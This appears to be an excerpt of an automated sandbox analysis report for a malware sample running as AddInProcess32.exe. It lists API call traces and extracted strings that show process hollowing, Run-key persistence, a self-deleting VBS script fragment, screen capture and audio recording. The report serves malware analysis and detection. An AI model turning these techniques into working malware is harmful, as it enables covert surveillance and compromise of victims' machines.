                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                            • String ID:
                                            • API String ID: 1084509184-0
                                            • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                            • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                            • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                            • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                            APIs
                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                            • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                            • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                            • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                            APIs
                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                              • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                            • DeleteDC.GDI32(00000000), ref: 00418F65
                                            • DeleteDC.GDI32(00000000), ref: 00418F68
                                            • DeleteObject.GDI32(00000000), ref: 00418F6B
                                            • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                            • DeleteDC.GDI32(00000000), ref: 00418F9D
                                            • DeleteDC.GDI32(00000000), ref: 00418FA0
                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                            • GetIconInfo.USER32(?,?), ref: 00418FF8
                                            • DeleteObject.GDI32(?), ref: 00419027
                                            • DeleteObject.GDI32(?), ref: 00419034
                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                            • DeleteDC.GDI32(?), ref: 004191B7
                                            • DeleteDC.GDI32(00000000), ref: 004191BA
                                            • DeleteObject.GDI32(00000000), ref: 004191BD
                                            • GlobalFree.KERNEL32(?), ref: 004191C8
                                            • DeleteObject.GDI32(00000000), ref: 0041927C
                                            • GlobalFree.KERNEL32(?), ref: 00419283
                                            • DeleteDC.GDI32(?), ref: 00419293
                                            • DeleteDC.GDI32(00000000), ref: 0041929E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                            • String ID: DISPLAY
                                            • API String ID: 479521175-865373369
                                            • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                            • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                            • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                            • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                            APIs
                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                            • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                            • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                            • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                            • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                            • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                            • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                            • ResumeThread.KERNEL32(?), ref: 00418470
                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                            • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                            • GetLastError.KERNEL32 ref: 004184B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                            • API String ID: 4188446516-3035715614
                                            • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                            • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                            • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                            • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                            APIs
                                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                              • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                              • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                            • ExitProcess.KERNEL32 ref: 0040D80B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                            • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                            • API String ID: 1861856835-1447701601
                                            • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                            • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                            • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                            • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                            APIs
                                              • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                              • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                              • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                              • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                            • ExitProcess.KERNEL32 ref: 0040D454
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                            • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                            • API String ID: 3797177996-2483056239
                                            • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                            • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                            • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                            • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                            APIs
                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                            • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                            • CloseHandle.KERNEL32(00000000), ref: 00412576
                                            • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                            • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                            • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                              • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                            • Sleep.KERNEL32(000001F4), ref: 004126BD
                                            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                            • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                            • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                            • String ID: .exe$8SG$WDH$exepath$open$temp_
                                            • API String ID: 2649220323-436679193
                                            • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                            • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                            • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                            • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                            APIs
                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                            • SetEvent.KERNEL32 ref: 0041B2AA
                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                            • CloseHandle.KERNEL32 ref: 0041B2CB
                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                            • API String ID: 738084811-2094122233
                                            • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                            • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                            • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                            • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                            • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                            • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                            • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Write$Create
                                            • String ID: RIFF$WAVE$data$fmt
                                            • API String ID: 1602526932-4212202414
                                            • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                            • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                            • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                            • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                            APIs
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                            • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                            • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                            • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                            • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                            • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                            • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                            • API String ID: 1646373207-4283035339
                                            • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                            • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                            • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                            • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                            APIs
                                            • _wcslen.LIBCMT ref: 0040CE42
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                            • _wcslen.LIBCMT ref: 0040CF21
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CFBF
                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                            • _wcslen.LIBCMT ref: 0040D001
                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                            • ExitProcess.KERNEL32 ref: 0040D09D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open
                                            • API String ID: 1579085052-1506045317
                                            • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                            • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                            • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                            • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                            APIs
                                            • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                            • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                            • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                            • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                            • _wcslen.LIBCMT ref: 0041C1CC
                                            • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                            • GetLastError.KERNEL32 ref: 0041C204
                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                            • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                            • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                            • GetLastError.KERNEL32 ref: 0041C261
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                            • String ID: ?
                                            • API String ID: 3941738427-1684325040
                                            • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                            • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                            • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                            • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                            • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                            • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                            • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                            • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                            • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                            • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                            • API String ID: 2490988753-3346362794
                                            • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                            • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                            • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                            • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$EnvironmentVariable$_wcschr
                                            • String ID:
                                            • API String ID: 3899193279-0
                                            • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                            • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                            • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                            • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
